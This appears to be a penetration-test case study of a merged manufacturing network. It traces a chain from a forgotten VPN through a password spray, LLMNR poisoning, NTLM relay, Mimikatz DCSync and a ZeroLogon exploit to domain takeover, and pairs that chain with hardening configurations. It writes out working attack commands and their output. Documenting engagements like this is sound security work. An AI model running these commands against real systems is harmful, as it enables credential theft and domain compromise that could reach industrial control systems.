Network Vulnerability Assessment & Pentesting Securing a hybrid OT/IT manufacturing enterprise against external VPN compromise, LLMNR/NBT-NS poisoning, and full Active Directory domain takeover

The Post-Merger Network Blind Spot

When two enterprises merge, they don’t just combine balance sheets — they fuse two distinct trust boundaries, two sets of legacy assets, and two histories of “temporary” exceptions that quietly became permanent. NordForge Industries inherited an entire acquired network whose firewall rules, forgotten edge appliances, and Active Directory trust relationships were undocumented and unaudited.

In an OT-heavy manufacturing environment, the stakes are categorically different from a typical corporate breach: a single pivot from the IT domain into the production OT segment can halt physical manufacturing lines, corrupt PLC logic, and convert a data-confidentiality problem into a safety and availability crisis. Over our 7-week engagement, we proved that the newly bridged network contained a clean, repeatable path from the public internet all the way to Domain Admin — and from there, directly toward the factory floor.

Technical Audit Snapshot

6-Phase Network Assessment Methodology

To stress-test NordForge’s merged perimeter and internal trust model, we structured the engagement around a rigorous, six-phase methodology spanning external reconnaissance through internal lateral movement.

Target Network Topology Under Test

NordForge operates a three-tier network: an internet-facing DMZ, a flat corporate VLAN backed by Active Directory, and a nominally isolated OT zone driving production PLCs. The merger introduced a second, unmanaged VPN concentrator that bridged directly into the corporate segment.

Vulnerability Classification Matrix

Each identified vulnerability was triaged using the standardized CVSS v3.1 framework and mapped to its corresponding attack technique and remediation status.

External Perimeter vs Internal Network Findings

The engagement split cleanly into two attack surfaces. The external perimeter handed us our initial foothold; the internal network handed us the entire domain. Toggle between the two below.

Critical Finding OC-NET-002 — Forgotten External VPN Foothold

External reconnaissance against the merged ASN surfaced a VPN concentrator that appeared in no asset inventory. Certificate transparency logs and reverse-DNS revealed it belonged to the acquired company. The appliance ran outdated firmware and — critically — authenticated against a local account database containing a stale, weak service credential.

Attack Path Sequence

Reconnaissance Proof-of-Concept

# External service discovery against the merged ASN range
nmap -sS -sV -p- --min-rate 2000 -oA nordforge_ext 203.0.113.0/24

# Excerpt — the forgotten VPN concentrator
Nmap scan report for vpn-legacy.nordforge.example (203.0.113.47)
PORT     STATE SERVICE   VERSION
443/tcp  open  ssl/https Legacy-VPN Portal 9.1.2 (EOL firmware)
500/tcp  open  isakmp    IKE
4500/tcp open  nat-t-ike

# Low-and-slow password spray against the SSL-VPN portal login form
hydra -L users.txt -p 'Summer2023!' -t 2 -W 30 \
  vpn-legacy.nordforge.example https-post-form \
  "/remote/login:username=^USER^&credential=^PASS^:F=Authentication failed"
[443][http-post-form] host: vpn-legacy.nordforge.example  login: svc_backup  password: Summer2023!

The concentrator bridged directly into a flat /16 corporate VLAN with no internal segmentation, placing every domain-joined host — including the domain controllers — one hop away from an internet-sourced attacker.

The Remediation Block (Before vs After)

Below is the dynamic comparison demonstrating the inherited, permissive edge configuration and our hardened, zero-trust VPN posture.

# Legacy SSL-VPN — local auth, no MFA
auth-source     local
mfa             disabled
firmware        9.1.2   # 2 majors behind, EOL

# Tunnel lands directly on flat corporate /16
split-tunnel    disabled
assigned-subnet 10.20.0.0/16
acl             permit ip any any   # no segmentation

# Hardened VPN — federated identity + MFA
auth-source     saml-idp           # central SSO
mfa             required           # TOTP / FIDO2
firmware        10.3.1             # current LTS

# Tunnel lands in a constrained jump segment only
split-tunnel    enforced
assigned-subnet 10.99.250.0/24     # VPN landing VLAN
acl             permit tcp 10.99.250.0/24 to jump-host 22,3389
acl             deny   ip 10.99.250.0/24 to 10.20.0.0/16
# Decommissioned legacy concentrator entirely

Critical Finding OC-NET-003 — LLMNR/NBT-NS Poisoning to NTLM Relay

With an internal foothold established, the flat network and legacy name-resolution protocols made credential capture trivial. Windows hosts fall back to LLMNR and NBT-NS broadcasts when DNS resolution fails — a routine occurrence with typos and stale shares. By answering these broadcasts, we coerced hosts into authenticating to us and captured their NetNTLMv2 material.

Attack Vector Diagram

Exploitation Mechanics

# 1. Poison LLMNR/NBT-NS and capture hashes
responder -I eth0 -wv

[+] Listening for events...
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
[SMB] NTLMv2-SSP Hash : NORDFORGE\svc_sql::NORDFORGE:88af...

# 2. With SMB signing OFF on targets, relay instead of crack
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"
[*] Authenticating against smb://10.20.14.31 as NORDFORGE\j.eriksson SUCCEED
[*] Executed specified command on host: 10.20.14.31
nt authority\system

Hosts whose users held local-admin rights elsewhere allowed us to relay straight to SYSTEM, dump local credentials with Mimikatz, and pivot — building the credential pile that ultimately reached a Domain Admin session.

# Mimikatz — harvesting cached secrets post-relay
mimikatz # sekurlsa::logonpasswords
  Username : svc_sql
  Domain   : NORDFORGE
  NTLM     : 9f3a...c21d
mimikatz # lsadump::dcsync /user:NORDFORGE\krbtgt
  [DC] 'nordforge.local' will be the domain
  Object RID : 502  Credentials NTLM : 5e1f...a09b

Hardened Domain Configuration

# Disable legacy name resolution domain-wide via GPO
# Computer Config > Admin Templates > Network > DNS Client
Set-GPRegistryValue -Name "Harden-NameResolution" `
  -Key "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" `
  -ValueName "EnableMulticast" -Type DWord -Value 0

# Disable NBT-NS on all interfaces (deployment script)
$nic = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=true"
$nic | ForEach-Object { $_.SetTcpipNetbios(2) }  # 2 = disable NetBIOS over TCP/IP

# Enforce SMB signing to defeat NTLM relay entirely
Set-GPRegistryValue -Name "Enforce-SMB-Signing" `
  -Key "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" `
  -ValueName "RequireSecuritySignature" -Type DWord -Value 1

Critical Finding OC-NET-001 — ZeroLogon Domain Takeover

The acquired environment’s primary domain controller was missing the August 2020 security rollup, leaving it exposed to CVE-2020-1472 (ZeroLogon) — a cryptographic flaw in the Netlogon protocol that lets an unauthenticated attacker set the DC’s machine account password to empty, then impersonate it.

Domain Compromise Vector

Exploitation Proof-of-Concept

# Confirm vulnerability (non-destructive check)
python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable to ZeroLogon (CVE-2020-1472)

# Exploit + immediate DCSync to extract domain secrets
python3 cve-2020-1472-exploit.py DC01 10.20.0.10
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'
Administrator:500:aad3b...:c0ffee...:::
krbtgt:502:aad3b...:5e1f...a09b:::

From here we held the keys to the entire kingdom — including the ability to forge Golden Tickets and reach the OT DMZ gateway, which an over-permissive firewall rule (OC-NET-005) allowed Domain Admin hosts to contact directly. We stopped at the OT boundary by prior rules of engagement, having conclusively demonstrated reachability to production-critical systems.

Critical remediation note: ZeroLogon exploitation can leave the DC’s secure channel broken. Our exploitation restored the original machine-account password immediately afterward, and we coordinated patch deployment as the very first remediation action.

Active Directory Pivot Explorer

Step through the full kill chain interactively. Select a stage to light up the pivot path and reveal the exact tooling, technique, and outcome at that hop — from the internet-facing edge all the way to the OT boundary.

hydra -L users.txt -p 'Summer2023!' -t 2 \
vpn-legacy.nordforge.example https-post-form \
"/remote/login:username=^USER^&credential=^PASS^:F=failed"

responder -I eth0 -wv
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"

python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable (CVE-2020-1472)
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'

# Domain Admin host permitted to reach OT DMZ gateway
nmap -Pn -p 502,44818 10.50.0.0/24   # Modbus / EtherNet-IP
# >>> ENGAGEMENT STOP — OT boundary reached per rules of engagement

Network Attack Surface Risk Score · Before vs After

A quantifiable representation of systemic risk reduction, calculated across external exposure, internal segmentation depth, credential hygiene, and Active Directory patch posture.

Side-by-Side Attack Simulator Replay

A real-time simulation tracking an attempted NTLM relay against NordForge’s legacy flat network and the post-engagement segmented, signing-enforced build.

Quantifiable Business Impact

Our assessment converted an opaque, post-merger network into a measured, defensible posture — and prevented a credible path to full domain compromise and OT-disrupting ransomware deployment.

Strategic Takeaways

Securing a merged, hybrid OT/IT estate demands treating the network itself — not just its applications — as a primary trust boundary.

1. Inventory is a security control. The single most dangerous asset was the one nobody knew existed. Post-merger reconciliation of every internet-facing endpoint, VPN, and trust relationship must precede integration, not follow a breach.
2. Flat networks turn one foothold into total compromise. Internal segmentation, enforced SMB signing, and disabling legacy broadcast protocols collapse the gap between “initial access” and “domain admin.” Defense-in-depth must assume the perimeter will be breached.
3. Patch posture on identity infrastructure is non-negotiable. A single unpatched domain controller (ZeroLogon) reduced a multi-stage attack to one command. Tiered administration and rapid DC patching are the highest-leverage controls in any AD environment — especially where IT compromise can cascade into physical OT impact.